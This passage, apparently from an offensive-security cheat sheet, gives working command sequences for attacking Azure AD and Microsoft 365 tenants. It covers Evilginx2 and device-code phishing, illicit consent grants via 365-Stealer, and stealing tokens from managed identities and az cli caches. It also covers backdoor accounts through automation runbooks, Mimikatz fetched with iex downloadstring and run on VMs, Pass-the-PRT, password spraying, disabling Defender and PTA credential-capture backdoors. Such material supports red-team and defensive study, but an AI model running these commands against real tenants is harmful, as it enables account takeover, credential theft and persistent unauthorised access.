Administrator'" | Get-AzureADDirectoryRoleMember -PS AzureADPreview> Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName -``` - -### Enumerate tenant with Az Powershell - -```powershell -PS> $passwd = ConvertTo-SecureString "" -AsPlainText -Force -PS> $creds = New-Object System.Management.Automation.PSCredential ("test@.onmicrosoft.com", $passwd) -PS Az> Connect-AzAccount -Credential $creds - -PS Az> Get-AzResource -PS Az> Get-AzRoleAssignment -SignInName test@.onmicrosoft.com -PS Az> Get-AzVM | fl -PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} -PS Az> Get-AzFunctionApp -PS Az> Get-AzStorageAccount | fl -PS Az> Get-AzKeyVault -``` - -### Enumerate tenant with az cli - -```powershell -PS> az login -u test@.onmicrosoft.com -p -PS> az vm list -PS> az vm list --query "[].[name]" -o table -PS> az webapp list -PS> az functionapp list --query "[].[name]" -o table -PS> az storage account list -PS> az keyvault list -``` - -### Enumerate manually - -* Federation with Azure AD or O365 - ```powershell - https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1 - https://login.microsoftonline.com/getuserrealm.srf?login=root@.onmicrosoft.com&xml=1 - ``` -* Get the Tenant ID - ```powershell - https://login.microsoftonline.com//.well-known/openid-configuration - https://login.microsoftonline.com/.onmicrosoft.com/.well-known/openid-configuration - ``` - -## Enumeration methodology - -```powershell -# Check Azure Joined -PS> dsregcmd.exe /status -+----------------------------------------------------------------------+ -| Device State | -+----------------------------------------------------------------------+ - AzureAdJoined : YES - EnterpriseJoined : NO - DomainJoined : NO - Device Name : jumpvm - -# Enumerate resources -PS Az> Get-AzResource - -# Enumerate role assignments -PS Az> Get-AzRoleAssignment -Scope /subscriptions//resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/` - -# Get info on a role -PS Az> Get-AzRoleDefinition -Name "Virtual Machine Command Executor" - -# Get info user -PS AzureAD> Get-AzureADUser -ObjectId -PS AzureAD> Get-AzureADUser -ObjectId test@.onmicrosoft.com | fl * - -# List all groups -PS AzureAD> Get-AzureADGroup -All $true - -# Get members of a group -PS Az> Get-AzADGroup -DisplayName '' -PS Az> Get-AzADGroupMember -GroupDisplayName '' | select UserPrincipalName - -# Get Azure AD information -PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 -PS AADInternals> Get-AADIntLoginInformation -UserName admin@.onmicrosoft.com -PS AADInternals> Get-AADIntTenantID -Domain .onmicrosoft.com # Get Tenant ID -PS AADInternals> Invoke-AADIntReconAsOutsider -DomainName # Get all the information - -# Check if there is a user logged-in to az cli -PS> az ad signed-in-user show - -# Check AppID Alternative Names/Display Name -PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq ""} | fl - - -# Get all application objects registered using the current tenant -PS AzureAD> Get-AzureADApplication -All $true - -# Get all details about an application -PS AzureAD> Get-AzureADApplication -ObjectId | fl * - -# List all VM's the user has access to -PS Az> Get-AzVM -PS Az> Get-AzVM | fl - -# Get all function apps -PS Az> Get-AzFunctionApp - -# Get all webapps -PS Az> Get-AzWebApp -PS Az> Get-AzWebApp | select-object Name, Type, Hostnames - -# List all storage accounts -PS Az> Get-AzStorageAccount -PS Az> Get-AzStorageAccount | fl - -# List all keyvaults -PS Az> Get-AzKeyVault -``` - -## Phishing with Evilginx2 - -```powershell -PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets -: config domain username.corp -: config ip 10.10.10.10 -: phishlets hostname o365 login.username.corp -: phishlets get-hosts o365 - -Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine - -# copy certificate and enable the phishing -PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt -PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key -: phishlets enable o365 - -# get the phishing URL -: lures create o365 -: lures get-url 0 -``` - -## Illicit Consent Grant - -> The attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. - -Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole` -* **Disable user consent** : Users cannot grant permissions to applications. -* **Users can consent to apps from verified publishers or your organization, but only for permissions you select** : All users can only consent to apps that were published by a verified publisher and apps that are registered in your tenant -* **Users can consent to all apps** : allows all users to consent to any permission which doesn't require admin consent, -* **Custom app consent policy** - -### Register Application - -1. Login to https://portal.azure.com > Azure Active Directory -2. Click on **App registrations** > **New registration** -3. Enter the Name for our application -4. Under support account types select **"Accounts in any organizational directory (Any Azure AD directory - Multitenant)"** -5. Enter the Redirect URL. This URL should be pointed towards our 365-Stealer application that we will host for hosting our phishing page. Make sure the endpoint is `https://:/login/authorized`. -6. Click **Register** and save the **Application ID** - -### Configure Application - -1. Click on `Certificates & secrets` -2. Click on `New client secret` then enter the **Description** and click on **Add**. -3. Save the **secret**'s value. -4. Click on API permissions > Add a permission -5. Click on Microsoft Graph > **Delegated permissions** -6. Search and select the below mentioned permissions and click on Add permission - * Contacts.Read - * Mail.Read / Mail.ReadWrite - * Mail.Send - * Notes.Read.All - * Mailboxsettings.ReadWrite - * Files.ReadWrite.All - * User.ReadBasic.All - * User.Read - -### Setup 365-Stealer (Deprecated) - -:warning: Default port for 365-Stealer phishing is 443 - -- Run XAMPP and start Apache -- Clone 365-Stealer into `C:\xampp\htdocs\` - * `git clone https://github.com/AlteredSecurity/365-Stealer.git` -- Install the requirements - * Python3 - * PHP CLI or Xampp server - * `pip install -r requirements.txt` -- Enable sqlite3 (Xampp > Apache config > php.ini) and restart Apache -- Edit `C:/xampp/htdocs/yourvictims/index.php` if needed - - Disable IP whitelisting `$enableIpWhiteList = false;` -- Go to 365-Stealer Management portal > Configuration (http://localhost:82/365-stealer/yourVictims) - - **Client Id** (Mandatory): This will be the Application(Client) Id of the application that we registered. - - **Client Secret** (Mandatory): Secret value from the Certificates & secrets tab that we created. - - **Redirect URL** (Mandatory): Specify the redirect URL that we entered during registering the App like `https:///login/authorized` - - **Macros Location**: Path of macro file that we want to inject. - - **Extension in OneDrive**: We can provide file extensions that we want to download from the victims account or provide `*` to download all the files present in the victims OneDrive. The file extensions should be comma separated like txt, pdf, docx etc. - - **Delay**: Delay the request by specifying time in seconds while stealing -- Create a Self Signed Certificate to use HTTPS -- Run the application either click on the button or run this command : `python 365-Stealer.py --run-app` - - `--no-ssl`: disable HTTPS - - `--port`: change the default listening port - - `--token`: provide a specific token - - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token -- Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console. - -### Setup Vajra - -> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra - -**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu". - - -## Device Code Phish - -Requirements: -* Azure AD / Office 365 E3 Subscription - -Exploitation: - -* Import TokenTactics: `PS C:\TokenTactics> Import-Module .\TokenTactics.psd1` -* Request a device code for the Azure Graph API using TokenTactics: `Get-AzureToken -Client Graph` -* Replace `` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft) -* Leave TokenTactics running in the PowerShell window and send the phishing email -* Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form -* Enjoy your **Access Token** & **Refresh Token** - - -## Token from Managed Identity - -> **MSI_ENDPOINT** is an alias for **IDENTITY_ENDPOINT**, and **MSI_SECRET** is an alias for **IDENTITY_HEADER**. - -Find IDENTITY_HEADER and IDENTITY_ENDPOINT from the environment : `env` - -Most of the time, you want a token for one of these resources: -* https://storage.azure.com -* https://vault.azure.net -* https://graph.microsoft.com -* https://management.azure.com - - -### Azure API via Powershell - -Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. - -Then query the Azure REST API to get the **subscription ID** and more . - -```powershell -$Token = 'eyJ0eX..' -$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' -# $URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# List resources and check for runCommand privileges -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: - logging.info('Python HTTP trigger function processed a request.') - IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] - IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] - cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) - val = os.popen(cmd).read() - return func.HttpResponse(val, status_code=200) -``` - - -### Get Tokens - -:warning: The lifetime of a Primary Refresh Token is 14 days! - -```powershell -# az cli - get tokens -az account get-access-token -az account get-access-token --resource-type aad-graph -# or Az -(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token -# or from a managed identity using IDENTITY_HEADER and IDENTITY_ENDPOINT -``` - -### Use Tokens - -> Tokens contain all the claims including that for MFA and Conditional Access - -* Az Powershell - ```powershell - PS C:\Tools> $token = 'eyJ0e..' - PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId - - # Access Token and Graph Token - PS C:\Tools> $token = 'eyJ0eX..' - PS C:\Tools> $graphaccesstoken = 'eyJ0eX..' - PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId - PS C:\Tools> Get-AzResource - # ERROR: 'this.Client.SubscriptionId' cannot be null. - # ---> The managed identity has no rights on any of the Azure resources. Switch to to GraphAPI - ``` -* AzureAD - ```powershell - Import-Module C:\Tools\AzureAD\AzureAD.psd1 - $AADToken = 'eyJ0…' - Connect-AzureAD -AadAccessToken $AADToken -TenantId -AccountId - ``` - -### Refresh Tokens - -* https://github.com/ConstantinT/Lantern - ```powershell - Lantern.exe cookie --derivedkey --context --prt - Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename --outpfxfile - Lantern.exe token --username --password - Lantern.exe token --refreshtoken - Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) - ``` -* https://github.com/rvrsh3ll/TokenTactics - ```powershell - Import-Module .\TokenTactics.psd1 - CommandType Name Version Source - ----------- ---- ------- ------ - Function Clear-Token 0.0.1 TokenTactics - Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics - Function Forge-UserAgent 0.0.1 TokenTactics - Function Get-AzureToken 0.0.1 TokenTactics - Function Get-TenantID 0.0.1 TokenTactics - Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics - Function Parse-JWTtoken 0.0.1 TokenTactics - Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics - Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics - Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics - Function RefreshTo-GraphToken 0.0.1 TokenTactics - Function RefreshTo-MAMToken 0.0.1 TokenTactics - Function RefreshTo-MSGraphToken 0.0.1 TokenTactics - Function RefreshTo-MSManageToken 0.0.1 TokenTactics - Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics - Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics - Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics - Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics - Function RefreshTo-OutlookToken 0.0.1 TokenTactics - Function RefreshTo-SubstrateToken 0.0.1 TokenTactics - ``` - -## Stealing Tokens - -* Get-AzurePasswords - ```powershell - Import-Module Microburst.psm1 - Get-AzurePasswords - Get-AzurePasswords -Verbose | Out-GridView - ``` - -### Stealing tokens from az cli - -* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` -* azureProfile.json in the same directory contains information about subscriptions. - -### Stealing tokens from az powershell - -* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` -* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** -* Users can save tokens using `Save-AzContext` - - -## Add credentials to all Enterprise Applications - -```powershell -# Add secrets -PS > . C:\Tools\Add-AzADAppSecret.ps1 -PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose - -# Use secrets to authenticate as Service Principal -PS > $password = ConvertTo-SecureString '' -AsPlainText -Force -PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) -PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' -``` - -## Spawn SSH for Azure Web App - -```powershell -az webapp create-remote-connection --subscription --resource-group -n -``` - -## Azure Storage Blob - -* Blobs - `*.blob.core.windows.net` -* File Services - `*.file.core.windows.net` -* Data Tables - `*.table.core.windows.net` -* Queues - `*.queue.core.windows.net` - -### Enumerate blobs - -```powershell -PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1 -PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt -Found Storage Account - testsecure.blob.core.windows.net -Found Storage Account - securetest.blob.core.windows.net -Found Storage Account - securedata.blob.core.windows.net -Found Storage Account - securefiles.blob.core.windows.net -``` - -### SAS URL - -* Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) -* Click on **Open Connect Dialog** in the left menu. -* Select **Blob container**. -* On the **Select Authentication Method** page - * Select **Shared access signature (SAS)** and click on Next - * Copy the URL in **Blob container SAS URL** field. - -:warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. - -### List and download blobs - -```powershell -PS Az> Get-AzResource -PS Az> Get-AzStorageAccount -name -ResourceGroupName -PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob -``` - -## Runbook Automation - -### Create a Runbook - -```powershell -# Check user right for automation -az extension add --upgrade -n automation -az automation account list # if it doesn't return anything the user is not a part of an Automation group -az ad signed-in-user list-owned-objects - -# If the user is not part of an "Automation" group. -# Add him to a custom group , e.g: "Automation Admins" -Add-AzureADGroupMember -ObjectId -RefObjectId -Verbose - -# Get the role of a user on the Automation account -# Contributor or higher = Can create and execute Runbooks -Get-AzRoleAssignment -Scope /subscriptions//resourceGroups//providers/Microsoft.Automation/automationAccounts/ - -# List hybrid workers -Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName - -# Create a Powershell Runbook -PS C:\Tools> Import-AzAutomationRunbook -Name -Path C:\Tools\username.ps1 -AutomationAccountName -ResourceGroupName -Type PowerShell -Force -Verbose - -# Publish the Runbook -Publish-AzAutomationRunbook -RunbookName -AutomationAccountName -ResourceGroupName -Verbose - -# Start the Runbook -Start-AzAutomationRunbook -RunbookName -RunOn Workergroup1 -AutomationAccountName -ResourceGroupName -Verbose -``` - -### Persistence via Automation accounts - -* Create a new Automation Account - * "Create Azure Run As account": Yes -* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription* - * Sample runbook for this Blog located here – https://github.com/NetSPI/MicroBurst - * Publish the runbook - * Add a webhook to the runbook -* Add the AzureAD module to the Automation account - * Update the Azure Automation Modules -* Assign "User Administrator" and "Subscription Owner" rights to the automation account -* Eventually lose your access… -* Trigger the webhook with a post request to create the new user - ```powershell - $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" - $AccountInfo = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}}) - $body = ConvertTo-Json -InputObject $AccountInfo - $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body - ``` - - -## Virtual Machine RunCommand - -Requirements: -* `Microsoft.Compute/virtualMachines/runCommand/action` - -```powershell -# Get Public IP of VM : query the network interface -PS AzureAD> Get-AzVM -Name -ResourceGroupName | select -ExpandProperty NetworkProfile -PS AzureAD> Get-AzNetworkInterface -Name -PS AzureAD> Get-AzPublicIpAddress -Name - -# Execute Powershell script on the VM -PS AzureAD> Invoke-AzVMRunCommand -VMName -ResourceGroupName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose - -# Connect via WinRM -PS C:\Tools> $password = ConvertTo-SecureString '' -AsPlainText -Force -PS C:\Tools> $creds = New-Object System.Management.Automation.PSCredential('username', $Password) -PS C:\Tools> $sess = New-PSSession -ComputerName -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) -PS C:\Tools> Enter-PSSession $sess -``` - -> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System - -```powershell -# List available VMs -PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name -ResourceGroupName Name ------------------ ---- -TESTRESOURCES Remote-Test - -# Execute Powershell script on the VM -PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1 -``` - -Against the whole subscription using MicroBurst.ps1 - -```powershell -Import-module MicroBurst.psm1 -Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt -``` - - -## KeyVault Secrets - -```powershell -# keyvault access token -curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER -curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER - -# connect -PS> $token = 'eyJ0..' -PS> $keyvaulttoken = 'eyJ0..' -PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken - -# query the vault and the secrets -PS Az> Get-AzKeyVault -PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText -``` - -## Pass The PRT - -> MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joined machines for lateral movement attacks via the Primary Refresh Token (PRT) which is used for Azure AD SSO (single sign-on). - -```powershell -# Run mimikatz to obtain the PRT -PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1") -PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"' - -# Copy the PRT and KeyValue -Mimikatz> privilege::debug -Mimikatz> token::elevate -Mimikatz> dpapi::cloudapkd /keyvalue: /unprotect - -# Copy the Context, ClearKey and DerivedKey -Mimikatz> dpapi::cloudapkd /context: /derivedkey: /Prt: -``` - -```powershell -# Generate a JWT -PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1 -PS AADInternals> $PRT_OF_USER = '...' -PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="} -PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER)) -PS AADInternals> $ClearKey = "XXYYZZ..." -PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne '')) -PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce -eyJ0eXAiOiJKV1QiL... -``` - -The `` (JSON Web Token) can be used as PRT cookie in a (anonymous) browser session for https://login.microsoftonline.com/login.srf. -Edit the Chrome cookie (F12) -> Application -> Cookies with the values: - -```powershell -Name: x-ms-RefreshTokenCredential -Value: -HttpOnly: √ -``` - -:warning: Mark the cookie with the flags `HTTPOnly` and `Secure`. - - -## Pass The Certificate - -```ps1 -Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose -Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert - -# Require the PRT, TenantID, Context and DerivedKey -& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId --prt --userName @.onmicrosoft.com --hexCtx --hexDerivedKey -# PFX saved with the name @.onmicrosoft.com.pfx and password AzureADCert -``` - -Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine - -https://github.com/morRubin/AzureADJoinedMachinePTC - -```ps1 -Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP -Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10 - -python Main.py --usercert C:\Users\Username\Documents\username\@.onmicrosoft.com.pfx -- -certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add" -``` - -## Intunes Administration - -Requirements: -* **Global Administrator** or **Intune Administrator** Privilege : `Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"` - -1. Login into https://endpoint.microsoft.com/#home or use Pass-The-PRT -2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune -3. Go to **Scripts** and click on **Add** for Windows 10. -4. Add a **Powershell script** -5. Specify **Add all users** and **Add all devices** in the **Assignments** page. - -:warning: It will take up to one hour before you script is executed ! - - - -## Dynamic Group Membership - -Get groups that allow Dynamic membership: `Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}` - -Rule example : `(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")` -Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group - -1. Open user's profile, click on **Manage** -2. Click on **Resend** invite and to get an invitation URL -3. Set the secondary email - ```powershell - PS> Set-AzureADUser -ObjectId -OtherMails @.onmicrosoft.com -Verbose - ``` - -## Administrative Unit - -> Administrative Unit can reset password of another user - -```powershell -PS AzureAD> Get-AzureADMSAdministrativeUnit -Id -PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id -PS AzureAD> Get-AzureADMSScopedRoleMembership -Id | fl -PS AzureAD> Get-AzureADDirectoryRole -ObjectId -PS AzureAD> Get-AzureADUser -ObjectId | fl -PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force -PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "@.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose -``` - -## Deployment Template - -```powershell -PS Az> Get-AzResourceGroup -PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP - -# Export -PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## Application Proxy - -```powershell -# Enumerate application that have Proxy -PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} -PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} -PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 -PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## Application Endpoint -```powershell -# Enumerate possible endpoints for applications starting/ending with PREFIX -PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} -PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage -``` - -## Conditional Access - -* Bypassing conditional access by copying User-Agent (Chrome Dev Tool > Select iPad Pro, etc) -* Bypassing conditional access by faking device compliance - ```powershell - # AAD Internals - Making your device compliant - # Get an access token for AAD join and save to cache - Get-AADIntAccessTokenForAADJoin -SaveToCache - # Join the device to Azure AD - Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" - # Marking device compliant - option 1: Registering device to Intune - # Get an access token for Intune MDM and save to cache (prompts for credentials) - Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache - # Join the device to Intune - Join-AADIntDeviceToIntune -DeviceName "SixByFour" - # Start the call back - Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" - ``` - - -## Azure AD - -With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD. - -1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/) -2. Change your browser URL to: https://azure.microsoft.com/ -3. Pick the account from the active sessions -4. Select Azure Active Directory and enjoy! - -### Azure AD vs Active Directory - -| Active Directory | Azure AD | -|---|---| -| LDAP | REST API'S | -| NTLM/Kerberos | OAuth/SAML/OpenID | -| Structured directory (OU tree) | Flat structure | -| GPO | No GPO's | -| Super fine-tuned access controls | Predefined roles | -| Domain/forest | Tenant | -| Trusts | Guests | - -* Password Hash Syncronization (PHS) - * Passwords from on-premise AD are sent to the cloud - * Use replication via a service account created by AD Connect -* Pass Through Authentication (PTA) - * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text -* Connect Windows Server AD to Azure AD using Federation Server (ADFS) - * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password - - -* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large -* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large -* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large -* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large - -### Password Spray - -> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds - -```powershell -git clone https://github.com/dafthack/MSOLSpray -Import-Module .\MSOLSpray.ps1 -Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 -Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! - -# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" -# Password - A single password that will be used to perform the password spray. -# OutFile - A file to output valid results to. -# Force - Forces the spray to continue and not stop when multiple account lockouts are detected. -# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. -``` - -### Convert GUID to SID - -The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. - -```powershell -GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] -SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] -``` - -For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` - -## Azure AD Connect - -Check if Azure AD Connect is installed : `Get-ADSyncConnector` - -* For **PHS**, we can extract the credentials -* For **PTA**, we can install the agent -* For **Federation**, we can extract the certificate from ADFS server using DA - -```powershell -PS > Set-MpPreference -DisableRealtimeMonitoring $true -PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents -PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals -PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1 -PS > Get-AADIntSyncCredentials - -# Get Token for SYNC account and reset on-prem admin password -PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force -PS > $creds = New-Object System.Management.Automation.PSCredential ("@.onmicrosoft.com", $passwd) -PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache -PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId -PS > Set-AADIntUserPassword -SourceAnchor "" -Password "Password" -Verbose -``` - -1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule` -2. Install a PTA Backdoor - ```powershell - PS AADInternals> Install-AADIntPTASpy - PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords - ``` - - -### Azure AD Connect - Password extraction - -Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf - -Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally ---- | --- | --- | --- | --- -ADSyncDecrypt | Yes | Yes | No | No -ADSyncGather | Yes | No | No | Yes -ADSyncQuery | No (network RPC calls only) | No | Yes | Yes - - -```powershell -git clone https://github.com/fox-it/adconnectdump -# DCSync with AD Sync account -``` - -### Azure AD Connect - MSOL Account's password and DCSync - -You can perform **DCSync** attack using the MSOL account. - -Requirements: - * Compromise a server with Azure AD Connect service - * Access to ADSyncAdmins or local Administrators groups - -Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account: -* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545 -* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync 